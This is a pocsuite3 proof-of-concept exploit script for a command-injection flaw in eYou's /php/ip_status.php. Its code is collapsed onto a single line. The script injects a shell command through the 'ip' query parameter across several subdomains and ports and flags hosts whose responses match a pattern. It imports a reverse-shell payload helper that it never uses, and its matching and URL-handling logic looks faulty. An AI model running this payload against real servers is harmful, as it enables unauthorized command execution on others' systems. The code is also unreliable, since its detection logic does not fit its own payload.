eYou /php/ip_status.php 命令执行漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.lib.utils import random_str from requests.exceptions import ReadTimeout from urllib.parse import urlparse import re class DemoPOC(POCBase): vulID = '0926' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2013-04-15' createDate = '2013-04-15' updateDate = '2013-04-15' references = [''] name = 'eYou /php/ip_status.php 命令执行漏洞' appPowerLink = 'http://www.eyou.com/' appName = 'eYou' appVersion = '#' vulType = 'Command execution' desc = ''' eYou 文件/php/ip_status.php命令执行 ''' samples = [] install_requires = [''] def match_patter(self, page_content, pattern=r'sbin/pinfo 127.0.0.1 view'): match = re.findall(pattern, page_content, re.I | re.M | re.DOTALL) return match def _verify(self): result = {} payload = '/php/ip_status.php?ip=;echo%207758' ports = ['80', '8080'] domains = ['www', 'mail'] url = self.url domain = url[url.index('.'):] if urlparse(url).netloc.split(':')[0].split('.')[-1].isdigit(): # 如果域名是IP，则不用替换子域名 domain = url.lstrip('http://') domains = [''] if domain.find(':') != -1: domain = domain[:domain.index(':')] for i in domains: for j in ports: url = 'http://' + i + domain + ':' + j + payload response = requests.get(url,).text if len(response) > 0: if self.match_patter(response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url break return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() register_poc(DemoPOC)